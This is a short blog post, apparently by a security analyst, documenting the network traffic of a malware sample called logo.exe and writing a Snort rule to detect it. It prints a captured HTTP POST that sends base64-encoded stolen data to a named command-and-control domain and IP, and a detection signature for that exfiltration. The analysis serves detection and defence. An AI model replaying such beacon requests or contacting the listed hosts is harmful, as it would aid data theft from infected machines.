Sunday, January 3, 2010

Snort Signature Practice: logo.exe

logo.exe POSTs a base64 encoded file to gator.php on yourclicker.cn (124.217.251.182). It also resolves ya.ru (77.88.21.8, 213.180.204.8, 93.158.134.8), but I never saw any traffic to these IPs:

POST /gator.php HTTP/1.0
Host: yourclicker.cn
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 3088

a=&b=&d=&c=UDNNTAAAAAA/BwAAEQAAAAAAAAAIAAAAIyw9LCyblXsSAAAAAAAAABAAAADZBwwABAAfABcA
AgAiAPkBEwAAAAAAAACkAAAApAAAAAMAAAA1NTI3NC02NDEtMjM4Mjk1Ni0yMzg0NAAuAAAA
...more base64

I based the signature on the file name and POST parameter names--the out of order d and c parameters felt unique.

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; content:"&d="; content:"&c="; sid:123120093;)

References:

Virustotal
ThreatExpert

No comments:

Post a Comment